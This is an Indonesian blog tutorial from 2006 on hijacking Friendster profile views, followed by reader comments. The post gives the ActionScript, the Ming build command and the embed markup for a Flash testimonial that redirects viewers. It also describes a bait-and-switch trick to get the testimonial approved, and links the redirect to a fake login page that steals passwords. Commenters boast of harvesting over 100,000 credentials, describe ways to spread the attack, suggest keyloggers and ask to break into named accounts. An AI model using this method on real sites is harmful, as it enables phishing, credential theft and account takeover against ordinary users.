Hack Friendster

12 12 2006

Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("https://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju https://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!

Caranya masukkan kode berikut :


<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='400' height='250'><param name='movie' value='http://numpang.com/out.swf' /><param name='quality' value='high' /><embed src='http://numpang.com/out.swf' quality='high' pluginspage='http://www.macromedia.com/go/getflashplayer' type='application/x-shockwave-flash' width='400' height='250' allowScriptAccess="never"></embed></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

Pesan buat anak2 ABG pecinta Friendster :

Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 – 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!

Referensi :

http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276

Sekilas info :

ternyata http://www.friendster.co.nr dah diubah toh… hihihi😀. Maaf ya kk.. dah publish ‘karya’ kamu😀


Actions

Information

625 responses

13 12 2006
Rendy Maulana dot Com » Blog Archive » Friendster Hacking!

[…] Tutorial ngehack Friendster oleh Chaidir. Nice toy…! […]

16 09 2009
Lisa

hey i need english instructions… thanks…

13 12 2006
rendy

Hi hi hi

mainan yang lucu…

13 12 2006
Naif Al'as

udah pernah saya posting di blog saya😀
[url]http://delrozo.blogspot.com/2006/07/deface-halaman-profil-friendster-1.html[/url]
[url]http://delrozo.blogspot.com/2006/07/deface-halaman-profil-friendster-2.html[/url]

thx atas ‘lanjutan’ nya😀

13 12 2006
iang

untung gw gak pernah dapter prenster :))

13 12 2006
Dimas

Hikmahnya buat para friendster mania: Pakai Firefox, install extension FlashBlock, dan kamu masih bisa mengakses friendster kamu😉.

13 12 2006
didats

aku sih ngeliat pesannya itu paling penting…
sayangnya, naro pesan sepenting itu di bawah… hihihi…

tau sendiri, kalo para abg dapet link ini, mereka gag pake baca-baca…
mereka langsung komen biasanya… (walaupun ada bebrapa yg masih baca sih)…

idenya keren!

13 12 2006
kunderemp

gak pernah approved testimonial aneh-aneh….
dan jarang buka friendster.

13 12 2006
g3mini

he he he….untung berinternet ria-nya di kantor gretong….tong…tong🙂

13 12 2006
prayogi

keren…

13 12 2006
Riky Kurniawan

Whew…mainan baru

15 12 2006
aku_zayah

@ dimas …

masih banyak cara lain buat phising fs, gak hanya pake pelash ..

firefox ngga mempan …

url nggak berubah: tetep http://www.friendster.com ….

bayangkan dalam waktu satu minggu bisa bajak +/- 10000 acc fs

xixixixixi … x))))

15 12 2006
QZoners

Friendster emang terlalu rentan untuk dibajak, so, gunain aja FS untuk cari sahabat, tapi jangan terlalu obral informasi disana

15 12 2006
black_hat

kwkwkwkw…. copy paste punya om th0r neh.. ekekekek… gmn indo bisa maju klo kerjanya cuma copy paste…

15 12 2006
chaidir

to black_hat :
Saya sangat menghargai hasil karya orang lain. Oleh karena itu, dalam setiap artikel yang saya buat, saya selalu mencantumkan referensi yang saya gunakan. Dalam artikel diatas saya mendapatkan referensi dari : http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276 Dan sebelumnya saya belum pernah tau tentang artikel yang dibuat oleh om th0r. Mohon maaf apabila ada kesamaan dengan artikel yang dibuat om th0r, namun itu BUKAN merupakan suatu kesengajaan.

Btw, Terimakasih atas informasinya😀

17 12 2006
boku_baka

Nice article!
beneran itu kodenya jangan dimasukkan ke testimoni?
hehehe.. kok jadi malah pengen nyoba >:)

17 12 2006
Budiaji Hartono

Oh…!
Wah…gak ngerti…!

18 12 2006
bakun

jarang FSan testi juga jarang yg aneh2, phising pun ga ada gunanya kl ke email gw wong isinya junk semua :))

22 12 2006
BLACK ID

>> Basi euy,,

Mainan ANAK SD Kalee..

Udah lama gw ngehack fs…

cuma lama2 kasian sendiri sama mereka..

24 12 2006
Ngehack friendster « 5Juni.com

[…] cara ngehack FS oleh chaidir […]

2 01 2007
BThe Torture

lu jiplak dari JASAKOM ya????? ayo ngaku!!!

2 01 2007
chaidir

to BLACK ID :
ampun om… saya masih SD..😀

to BThe Torture
iiiii….iiiyyaaaa… om….
ampunnn om….

3 01 2007
helgeduelbek

weh ladhalah pesan yang terakhir itu saya yang tertarik… biar tidak buang waktu dan biaya yg kurang berguna

6 01 2007
desy

minta bantuannya donkk, urgent bngt. account friendster gw di hack orang bisa bantu ga?

7 01 2007
eL_piojo

halah cupuuuu make linux ga tau make flash di windows ya ??
kan di windows juga bisa ga mesti make ming kalo ngasih tutorial yang ikhlas dong mas aq dah nyoba make di flash na windows bisa koq …

7 01 2007
chaidir

to helgeduelbek :
yups.. saya setuju…😉 internet sangat sayang jika dipakai hanya buat fs-an.. mendingan google-an😀

to desy :
maaf saya ga bisa bantu.. mungkin temen2 yg laen bisa bantu? saya ga bisa ngehack…😀

to el_piojo :
ok.. silahkan mas piojo buat tutorial yang IKHLAS menggunakan flash di windows..😉

11 01 2007
indesign

var linebreak = “”;
document.write(linebreak);
for(i = 0; i

11 01 2007
indesign

hmmmm….. ok deh kaka….. good luck yah

13 01 2007
mozart

bos chaidir yg baik aq minta diajarin carane ganti passwordte orang lain di friendster doooong . plisss and balesen di emailku yo

22 01 2007
Th0R

Dear all,

Wah artikel beginian jadi banyak yah ada dimana-mana. Hehehe. Kalau memang bukan sebuah kesengajaan, gw acung jempol, setidaknya anda ingin berkembang dan itu membuktikan bahwa ada 1 lagi pejuan cyber di Indonesia yang bisa menghasilkan sebuah exploit yang bukan merupakan hasil pengembangan belaka! Nice find.

Mau kasih saran dikit deh buat semua yang baca blog ini ..
Daripada makek script si abang diatas yang puanjang sekaleee. Lebih baik coba pakai yang lebih mudah, singkat, padat dan jelas:

Thanks.
Th0R (http://www.sate.name)

22 01 2007
Th0R

Dearl all,

Sedikit tambahan deh kelupaan. Hehehe.
Kalau anda punya hosting sendiri, bakalan lebih FATAL bagi victim kalian kalau tehnik ini anda kombinasikan dengan seni menipu, hehehe, bagaimana mksdnya? Pertama tama anda buat http://www.abc.de/out.swf yang dimana out.swf itu adalah flash lucu2an memberikan ucapan selamat Valentine or whatsoever u want. Then send the testimonial, orang akan melihat itu sebagai testi biasa dan melakukan approve terhadap testimonial anda, once testimonial tersebut sudah di approve, dia akan berada di index friendster milik orang tersebut, dan anda akan tahu karena di friendster anda akan ada tulisan kalau teman anda yang 1 itu melakukan update new testimonial. Just go to ur hosting, simply change out.swf dengan swf menipu seperti yang diajarkan diatas. Hasilnya, mgkn sang pemilik account tidak akan kena secara lgsg kalau tidak check index mereka pribadi, namun justru kebiasaan orang yang jarang nge-check index pribadinya itulah kita mendapatkan keuntungan. Puluhan, atau bahkan ratusan teman dia yang akan melihat index dia akan terkena tipuan ini. Kalau 1 orang dapet 10 teman nya, anda brarti melakukan hacking terhadap 500 orang kalau anda menaruh pada 50 teman anda. Dan lagi anda tidak jahat karena tidak melakukan hacking ke teman, melainkan anda melakukan hacking ke orang yang tidak anda kenal secara lgsg. Lalu dari tiap ID tersebut anda bisa melakukan lagi hal serupa, dan seterusnya.

Rekor terakhir, saya pribadi berhasil mengoleksi lebih dari 100rb Email dan Password friendster. Hehehe.

NB: chaidir, blog anda ini juga memiliki kelemahan yang bisa dibilang cuman pengembangan kecil dari exploit friendster itu sendiri. Dan bisa dibilang cukup berbahaya bagi para pendatang yang terhitung awam.

Thanks.
Th0R {http://www.sate.name)

22 01 2007
chaidir

to om Th0R :
sebelumnya makasih ya udah mampir ke blog saya yang biasa-biasa ini😀
sebenernya saya buat artikel diatas itu atas pengalaman pribadi saya sendiri yang pernah menjadi ‘korban’😀 dan tujuan sebenernya bukan untuk nge-hack nya.. tapi biar hanya saling mengingatkan untuk lebih aware buat temen2 yang sering menggunakan friendster.. mungkin om Th0R juga udah pernah buat tutorial mengenai ini, tapi karena sebelumnya saya belum tahu.. akhirnya saya cari2 sendiri di internet😀 mudah2an bukan dianggap ‘menjiplak’ dari tutorial yang udah dibuat oleh om Th0R…

wah… klo wp.com ada vulnernya serem juga yah…. mungkin om Th0R bisa berbagi info😀

ok deh… makasih banyak ya buat informasinya…

Jayalah terus pejuang cyber indonesia…

22 01 2007
Th0R

Dear chaidir,

Someone told me about this WP anyway. Hehehe.
Hmm. Iyah, ada sedikit bugs disini, not a major one, but kinda tricky and dangerous, u can try to bump me up on Yahoo Messenger ID martha_moyung in order to ask. Just if you want to know, i will let you know.

Thanks.
Th0R (http://www.sate.name)

25 01 2007
jony

kok gw ga bs buka new testi yah?apa ini dibajak??
trus klo gw buka dsuruh re log in stelah di login malah kluar java sript error,,
tolong bantuannya harus diapain?..
trimakasih…

28 01 2007
goqielz

Tolong jelasin lagi,…Script2x tadi di taruh di bagian mana,..
kalo pengguna windows gimana caranya???kok cuman pengguna linux (ubuntu) aja yang ada keterangannya.

30 01 2007
ezzot

gimana cara ngehack fs punya presiden RI???

2 02 2007
Quality Indonesian Blogger » Blog Archive » Friendster Hacking!

[…] Tutorial ngehack Friendster oleh Chaidir. Nice toy…! […]

5 02 2007
Plesetan Friendster « aCh

[…] Mungkin masih banyak plesetan2 friendster yang lain. Tapi plesetan ini bukan untuk ‘hiburan’ semata, tapi malah bisa membahayakan karena user dan password anda akan dikirim ke tempat yang telah ditentukan oleh pembuat plesetan friendster. Untuk dapat ‘mampir’ ke Plesetan Friendster caranya sangat sederhana, silahkan lihat cara hack friendster. […]

6 02 2007
ans

wah sangar nech….. friendster nggak aman lagi donk…. entar q coba dulu ya… baru komentar…. thanks infonya to orang suka iseng kayak saya…. hati-hati para friendster mania, I am coming

8 02 2007
mimi

oke koq

8 02 2007
nanta

friendster gak serendah itu mas……………
lewat friendster kita bisa berhubungan dengan banyak orang, nambah teman, n bisa mendapatakan banyak sekali hal positif……………….

kalo mas bilang “lebih baik bikin blog sendiri” friendster kan punya fasilitas buat bikin blog juga,,,,,,,,.,,,,,,…………….

11 02 2007
cK

Buat saya, friendster itu media untuk menemukan teman2 lama. Walaupun saya sendiri suka sebel sama banci friendster, tapi situs itu cukup membantu saya menemukan teman2 lama. Asal jangan keseringan buka aja. Malah aneh. Masa makanan sehari-hari situs friendster??😀

12 02 2007
idoenk

wellleeh,
mbah th0r nongoL disini,
pasti biasa banget googling neeh -_-“.

friendster?
baru jadi tempat maen baru buat saya neeh,
ketimbang fungsi FS benerannya, hehe.
tapi masih ttp kalah sm mbah th0r yg bisa ampe 100ribu,
ck..ck..ck.. -_-” (cape deeee)

btuL kt mbah th0r,
~Trust is Weakness~ deh buat Friendster.
(mbah th0r make semboyan itu dari game Uplink yah??!!)
saya blom tamat2 ney, wot a LamE.🙂

.::Astalavista::.
idoenk.

18 02 2007
nita

lucu..

n bagus buat orang yang jenius..

22 02 2007
dedDisSey

keren om….sumpah enak bgt bwt belajar na…

22 02 2007
nnc

wadu, fs dah ngepatch script dekorasi lg ne..

ada yang tau script yg masi jaln buat modif skin fs yg keren ga??
ada info ne, ada worm baru yang nyerang fs..
ciri2 yg kena “acoun is not aviliable” klo anda buka tu profile yg dah ke infeksi, anda juga aka kena.. cara ngilangin nya, silahkan hapus script worm di media css anda, trus clear cache di browser..

thnx nangkacomm

22 02 2007
nnc

@ mbah tH0R,🙂 , ko acoun ku di sate ga bisa posting knp ya?? stiap posting dah kekirim, tp ga nyampe..

thnx bwt masnya yg punya blog🙂

25 02 2007
FRIENDSTER LOVER

YEEE MENDING LIATIN FRIENDSTER DARI PADA LIAT ELU/

2 03 2007
linda

ajarin saya belajar buat friendster donk

8 03 2007
Parasite_Eve

kk..wa Cyber coepoe…
FS wa dihack commentna ga bisa trus testinya jga ga seenak orang yg ngehack tuh…hikssss
plizzz….,,,

13 03 2007
pejuang hacker

mending pake script yang ada di buku cara mudah hacking komputer terbitan andi yogya script2nya lebih irit n langsungbisa dijalankan

20 03 2007
doel bdoel

aq sama kyk gemini,, untung pake’ internet kuantor kui kui kui jd ndak abis uang n msh bs makan bakso🙂 sbenarnya aq lbh suka pangsit drpd bakso aplg yg gratisan,,,, (Yee.. dasar) aq suka pangsit yg pake ayam (dasar oOn nie Org,smua Pangsit ya pake ayam OoN!!)
udah ah,,,drpd aq ngaco n comment aq slalu dikripik eh dikritik mending aq abisin ampe dsni aj..
oy bro, makac buat ilmunya… tokcer bgt
Asta La Vista

20 03 2007
sugab

om.. masi newbie neh… tlng kasi tau cara dapet pass target yg mo d ketahui buat cari informasi nya ajah….. abis fsnya sekarang dah d lock jd ga da yg bisa liat profil dia… huhuhuhuuhuhuhu… reply k email aku aja yah….. makasi kk2 sekalian

21 03 2007
kyle

elo guys.. is this a tutorial on how to hack friendster acct? can someone explain it english..will be much appreciated..

23 03 2007
Ryan

Boss Gak MuJur Gak iSa FS Orng Gak eRoR

23 03 2007
Ryan

FSSSSSSS Orng Gakkkkkkkkkk eRORRRRRRRRRRRRRRRRRRRRRRRRRRRRR

23 03 2007
akakage

Hmm…. Truz terang dari sini saya baru mengetahui beberapa hal yang mungkin org2 dah tau dari jaman dulu

Chayo deh bwt yg bagi2 ilmu gratis!

thx b4 bwt ilmunya

23 03 2007
akakage

Btw ada org yang merusak citra organisasi di sekolah nih lwt Friendster dia , sebaiknya gimana ya? (ksh tw cara jebol password ato minimal tw imelnya dah)

thx b4

25 03 2007
angelica

yeah in english… please can somone translate it cause i really want to know if my boyfriend was still using his account on friendster.please

27 03 2007
adik_iphul

kak bisa ajariin hacking server isp
aku ingin lewatkan ip ku

29 03 2007
br0wniEs_Br0nt0x

hmmm, th0R ampe maen2 ksini jg, kirain cm d jasakom, tnyt fs jg toh, lwt flash bisa, lewat picture jg bs hehe

peace man

3 04 2007
kera ngalam

ngomongnya pada ngaco semua !!!!!!! ngawur….. ngawur……

7 04 2007
andikz

$%$#@!%$#@#$$%#@ pada ngomentar apa sih????mending dr pd yu komentar, kita makan bakso bareng2 yuuuuk……

8 04 2007
idoenk

@br0wniEs_Br0nt0x
hey there, eh yg pake flash kan cuma redirect biasa,.:D
kalo yg pake picture maksutnya PNG?
itu method steal cookie bukan?
utk update FS baru2 ini masih workin’ properly gak?

uhm, prnh coba bbrp cara lama steal cookie,
skr dah gak bisa lagi euy??! aarrrggh.

Thanx, 1d03nk.
.::Astalavista::.

11 04 2007
jaya

Tolongin gw dunk, bisa nyariin password dari account http://www.friendster.com/20459576
itu account temen gw, cuman dibajak ama orang en diubah isinya jadi aneh-aneh, tolong, please…
Klo bisa kirimin ke gw juga cara ngedapetin password dari account2 FS, ya… Thank You… freedom_x001@hotmail.com

11 04 2007
jaya

Tolongin gw dunk, bisa nyariin password dari account http://www.friendster.com/20459576
itu account temen gw, cuman dibajak ama orang en diubah isinya jadi aneh-aneh, tolong, please…
Klo bisa kirimin ke gw juga cara ngedapetin password dari account2 FS, ya… Thank You… e-mail gw di : freedom_x001@hotmail.com

14 04 2007
Institut Preman Dalam Negeri « Indefinitely

[…] lu nyobain nge hack friendster nya denga taktik bang aCh https://chaidir.wordpress.com/2006/12/12/hack-friendster/ or taktik […]

21 04 2007
Fihk

.: Hebrat !!! [hebat berat]
Ada cara yang lebih rumit gak!!!
kayaknya masih gitu-gitu aja….he…he…he…

Mas Ach…
anda pake wordpress kan,
katanya wordpress ada masalah ama bugs nya?
apa bener?? coba cek deh…

Oh ya…
salam kenal

mas bisa ajarin all about web and perHackeran??? [klo bsa e-mail in OK]
saya masih awam ni….

21 04 2007
Fihk

Maaf mas..
Liat sendal saya ga???

kok baru bentar di tinggal ke toilet sambil nunggu comment nya dikirim, sendal saya langsung ilang????

wah makin hebat aja yah hacker tu???
gak cuma ngambil data orang…eeeh sendal orang juga di embat!!!

enggak ada mas???

ya udah deh…

makasih….

21 04 2007
Ncrut the Hatez Friendster

Terus berjuang Ach

gw swetwuju !!! Lebih baik makan baso dr pada main FS!!
sebagai tetangga tukang baso, gw bangga banget Lo mau
mempromosikan mereka dengan ikhlas….

oh iya mas.
tetangga gw yang satunya lagi kan tukang rujak nih…
dia minta di promosiin juga.

terimakasih dengn segwala hwormat

21 04 2007
Maniak

oh iya
katanya cara ngeHack friendster bukan cuma ada di jasakom
ma disini lo…

penasaran….

lo cek deeh di duniasex.com

21 04 2007
Iwaz

Fihk!!!
lo di cari kemana-mana ternyata main ampe kesini!!!
cepetan pulang!!!
bentar lagi mau hujan!!

genteng belum lo angkatin!! kalo ampe basah gimana???

21 04 2007
Fihk

apaan sih lo!!!

gw dah pulang juga…
qw dah mo nyampe depan rumah…

21 04 2007
yusep

adduuh gmn yah caranya..ngahecker …?;))

22 04 2007
Dhao Woods

ajarin gw lebih dalam tentang ilmu hacker donk, bantuin yah??? visit my hompage: http://www.friendster.com/mdaw ataow add my FS: dhao.woods@gmail.com

24 04 2007
martin

Halo bang, tolong kirim turorial gimana cara ngehack password friendster kalo kita dah punya alamat emailnya…

Atao liat profil friendster yang pake privacy itu..

Ma kasih, tolong kirim ke martin2rich@yahoo.com

27 04 2007
bhatrix

hai all gw mau minta tolong nich gmn sich cara nya bikin profil di FS kita jadi private profil???
susah gak caranya? gw pengen tau caranya gmn sich ada yg bisa bantu,please…………

28 04 2007
Idoenk

Tidak hidup, ini cuma junk shit ajah..
buat yg mau blj, tapi diharapkan tidak
cuma mengharap meminta
bisa kunjungi kami
Team Penasihat Keamanan (SecurityAdvisoryTeam) ~ SATe
http://sate.name

blom nemuin yg sebagus forum itu, utk share & berbagi ilmu.

.::Astalavista::.

30 04 2007
ismay

friendster gue gak bisa dibuka,karena gue lupa emailnya ama passwordnya. nach gimana nech ngatasinya…?

3 05 2007
Black_list

Pergi sampai pintu gerbang kebahagiaan sang hacker

4 05 2007
coky

wew…..numpang kopi tutorial mas……KERENNN………
maunya sih ngupdate blog juga hehehehe///………..

5 05 2007
Kuro

ckckckck… kk ga ada karya laen y.. ini c sering gw lakuin.. bahkan di jambihack, ato di jasakom .etc dh dah ada.. klo lo ngeerasa jago alias hacker cb bobol accountnya.. dasar newbie aj blm.. cm posting aj..

8 05 2007
john

chaidir..boleh tak tolong dptkan saya password friendster utk fara_gs@yahoo.com?tolong ya..ni e-mail sy..blaxican_7@yahoo.com..

19 05 2007
idoenk

@atas gw..
u can go through http://www.sate.name and pm on m3h..
maybe i can give u a hand on those problemo..
catch me ID there: idoenk

is this wot you wanted:

hehee.. ^_^”V

.::Astalavista::.

21 05 2007
jil_cupu

kalo mau bilang gue adalah orang yang pernah di kerjain friendster ama teman2 gue……pasword gue di bobol dan gambarnya diganti bokep semua ……..XD
gue pingin balas dendam ama mereka,tapi gue ngak tau mau berguru kepada siapa.plis buat pada master2:
Chaidir ,black_hat, om Thor(master), br0wniEs_Br0nt0x
GUE MOHON JADI’IN GUE MURID LOE2 PADA………

Jil_cupu

jesuskeepmylife@yahoo.co.id

………plis jangan hancurkan hati dan email, friendster gue
dan jadiin gue murid plis…^_^

22 05 2007
coba

SISTEM SERVER HACKED

by

HAMZ
Infos: [jebalkober@yahoo.com] – [www.geocities.com/jebalkober]

22 05 2007
coba dulu
23 05 2007
leye

i can’t understand anything…could you please translate your answer in english on how to hack a friendster account??

23 05 2007
leye

i can’t understand anything…could you please translate your answers in english on how to hack a friendster account??

25 05 2007
cabe deh

simple and easy.. tanam keylog…😀

28 05 2007
DJ-URY

kalau soal hackig and cracking agak sedikit kurang luas pergaulanku,,, maaf kalau ngga sopan nich pertanyaanku,,,cara ngehack password di yahoo gimana ya om???

29 05 2007
orang bingung

please gw lagi bingung ni fs gw ada yang nge hack n ngeganti paswordnya…

gimana donk cos d fs itu photo2 gw pada diganti ma yang ga bener….

pls bantuin gw ya… gmana cara ngehack lagi gw cma pengen FS gw bersih lagi…

8 06 2007
ken

sekedar mo ngasih tau aja……

klo harga bakso prmangkok-nya skarang 7,5 jt…..naik bro
apa kalian masih pd sanggup beliii…?????

11 06 2007
Batara

please gw lagi bingung ni fs gw ada yang nge hack n ngeganti paswordnya…

gimana donk cos d fs itu photo2 gw pada diganti ma yang ga bener….

pls bantuin gw ya… gmana cara ngehack lagi gw cma pengen FS gw bersih lagi…

11 06 2007
Batara

pleaze, gw baru nge daftar jadi anggota friendster but aq kagak tahu giman cara ngechating ma orang yang lgi online

15 06 2007
rendy

please, gua baru daftar fs, tapi ga bisa make internet, gimana ya caranya :p :p

19 06 2007
vokalis_jelek

wdew,,,
dsini ko bnyk org pinter bgtuan yach??
ada yg adu hack2an lg
wew,,
sbnrnya langkah awal bwt mnjd sprti kalian tuch ap c??
kalian g mngkn kan bs lgsg pinter jebrot ky gt??
wkwkwkwk,,
psti dlu jg bego kaya wa??
wqwqwqwq,,
ajarin wa dunk!!
byr ad krjaan gtu klo kwarnet slain bukain FS hekekeke,,,
yah,,
yah,,
yah,,
yah,,
plisss,,mas2yg baek hati!!!

21 06 2007
Capz_man

kok ga bisa ya bro..apa udah di matiin ya?

23 06 2007
blax

HEH SANG HECKER!! AKU MENANTANGMU!!!! KALIAN EMG PECUNDANG!!!!

FROM : vendetta0_0524@yahoo.it

WE ARE THE BEST & BEAST!!!

23 06 2007
Bolehditerawang

ngutip ya……………..?

23 06 2007
Bolehditerawang

YM saia bolehditerawang

24 06 2007
can u translate it to english

pls

2 07 2007
bree

can u help me.. bcoz someone hack my friendster.. if u dont mind teach me how can i have it back plzxzzz… tanx!

5 07 2007
Tuan PutelY

huhuu…send k e-mail gw dunk cara yang lebih gampang n mendetail tentang cara rusak e-mail orang!!! soalnya aq lagi diserang … di teror sm pemilik fs ga bertanggung jawab neh!!!huuhuhu,,,

5 07 2007
Tuan PutelY

huhuu…send k e-mail gw dunk cara yang lebih gampang n mendetail tentang cara rusak e-mail orang!!! soalnya aq lagi diserang … di teror sm pemilik fs ga bertanggung jawab neh!!!huuhuhu,,,

ralat:
cara rusak friendster…bkn e-mail!!thnx a lot be4..

6 07 2007
ADHY

bozzzzzz tolongin gw!!!!! fs gw di bobol ma orang laen dan di masukin gambar yang engga2!!!! jadi gw minta caranya bobol password di fs!!! please

11 07 2007
nidjie

woiiiiiiiiiiiiiiiiiiiiiiiiiiiiii temen2x se indonesia……………………..ajarin dunk aku cara ngehack paling dasar terutama yang buat ne blog……………………pliss ya c z tulisan d atas agak rumit bagi aku……………………….bagiin cara ngehack ……….d warnet ………….misalnya ngirim pesan k PC laen ……ngematiin PC laen…..dsbganya deh………………….tlng yang detail caranya ya……………………….kirim k emailku

12 07 2007
Look'At'MyEyes

Bener gak lo tutornya, hahahaha,..udah brapa kali gue coba but kaga jalan…itu kan script Flash Doank…trus Java Script nya mana yang buat nge-Direct ama Deface..bukannya harus di susupin Java Script or VB script,,,
trus trang gue dah coba but kaga ada hasilnya…ehehehehe
kalau emang bener, HACK FS KOE…di http://friendster.com/marlonzone

18 07 2007
iR

Macam mana ini semua?

+iR+

22 07 2007
ucupfcr

ga ngerti maksudnya…
ajarin yang simpel dong….
ku tunggu balesannya di email ku

24 07 2007
amy

hak setiap orang mau menghabiskan waktnya di mana dan buat apa.
hak setiap orang juga punya kepentingan sendiri untuk membuat FS.
sayang sekali kalo kepintaran yang dipunya hanya untuk mencampuri urusan pribadi orang. dan jujur saya amat sangat membenci hacker yang ga punya etika memasuki dunia pribadi orang lain melalu FS atau sejenisnya. setiap orang memiliki kepentingan sendiri2 terhadap FS. dan ga ada satu pun dari orang orang seperti kalian yang pernah berpikir bahwa FS benar2 bisa menyelamatkan nyawa orang. karena kalian,,memang menganggap pribadi sesorang seperti mainan. terima kasih.

24 07 2007
amy

dan satu hal lagi.
sayang sekali uang 3000-5000 per jam yang anda keluarkan hanya untuk mengurusi urusan orang, mengganggu privasi orang lain.
sayang sekali dengan uang segitu hanya dipakai untuk dosa yang ga sebanding dengan nominalnya, bahkan bisa anda sumbangkan kepada yang membutuhkan, kepintaran anda bisa dibagi dan dimanfaatkan untuk hal2 yang positif.

30 07 2007
Bayu

TOLONGG..
Passwor emailku dan FSku di colong orang, isinya diganti pula.. hiksss..

kalo ada yang baik hati dan lagi gak sibuk n bisa tolong di hackin passwordnya, accountku lontongbrewok@yahoo.com di FS.
I believe there still white hacker outthere…

Thanks

Regards,

Bayu Setyo Dewangga

PS : tolong kirim ke emailku di deserteagle@lycos.com (yang ini jangan dihack juga aku udah frustasi hiks…)

31 07 2007
satan
31 07 2007
satan

goblok kampung banget sih. mau ,au mereka mau maen fs ke mao enggak. mau punya duit ato gak. ganggu hepi orang aja.. kampungan!

3 08 2007
Jason

wah..
Jgn de kalo soal fs..(Udah kaya pacar kedua buat ce2)
kesian bgt tu ..ada anak smu cewek sampe nangis2.. untung ada abang yg bantu ilangin hacknya hehehehe..

Cheers

3 08 2007
Andri

Hebat ni tricknya mas Chaidir, dapet aja. Hebat banget

4 08 2007
noter

hi..boleh tak sesiapa disini bantu saya macam mana ingin mendapatkan semula password friendster saya yang telah diambil orang lain. Orang itu telah mengubah password akaun friendster saya dan saya tidak dapat log in..tolong bantu saya..email saya di abggian707@yahoo.com

7 08 2007
Flashtronic

Wah Wah.. ikutan ahh..
Ada lagi ilmu yg lain mas chaidir?

Makasi ni..

15 08 2007
puspa

frienster aku kena hack jadi ga bisa dibuka samasekali..seperti dilarang masuk rumah sendiri..
mohon bantuannya dunx..

21 08 2007
fuxored

binigay ko dito email address ko nadelete ung account ko. ayus.

21 08 2007
wanna_be

si thor ma si idoenk ma cs nya pade kemane tu?para maesro hacker pada kemana lu?
masa baru di tegor amy segitu doank dah nyerah…hehe kalah argumen neh.
bener kata amy kesian tu yang pada suka fs an, masih pada punya hati nggak seh lu.coba lu pada bayanngin kalo yang di hack fs mak lu pade trus di pasangin foto2 yang ga bener…nah lu, pasti lu pade pengen ngebunuh tu hacker kan?makanya….
trus kalo bikin dosa jangan nangung2 donk, ngehack koq hack prendster.nge hack yang profit donk yang bisa ngehasilin duit ato lebih tepatnya maling cuma malingnya agak jenius an dikit aj.trus duitnya bisa lu kasih ke mak lu deh buat beli beras, beraas kan mahal tu sekarang.ato bisa buat beliin bakso tmn2 lu…gw belin juga yak…hehe.

wanna be===========>black_april

25 08 2007
catherine

makasih ya,setelah baca ini aq jadi sedikit ngerti..

26 08 2007
workalkholil

assalamu’alaikum bang
jangan lupa routingnya yah bang…hahahahaha
salut neh ama anak2 muda sekarang..ngeri2 ilmunye.kagak ngerti ane.
kalo ane cuma punya ilmu kudu.
buat bang ach ..jaga kesehatan yah …kalo capek banget kasih ane deh
tuh Blok2 ipe yg bikin mumet.rindu jakarta neh cing.

salam.

27 08 2007
GTA

mazzzz…

minta tolong donk
ini fs sy di hack orang

kalo saya klik view profile jadi munculnya profile punya org lain
tolong donk mazz….gimana nih cara benerinnya …

thx

27 08 2007
haekal

kk chaidir..
kalo yg tidak linux (vista)gimana caranya ngehack password fs orang lain??
saya udah coba banyak cara tapi kebanyakan gagal..
trims..

30 08 2007
budi

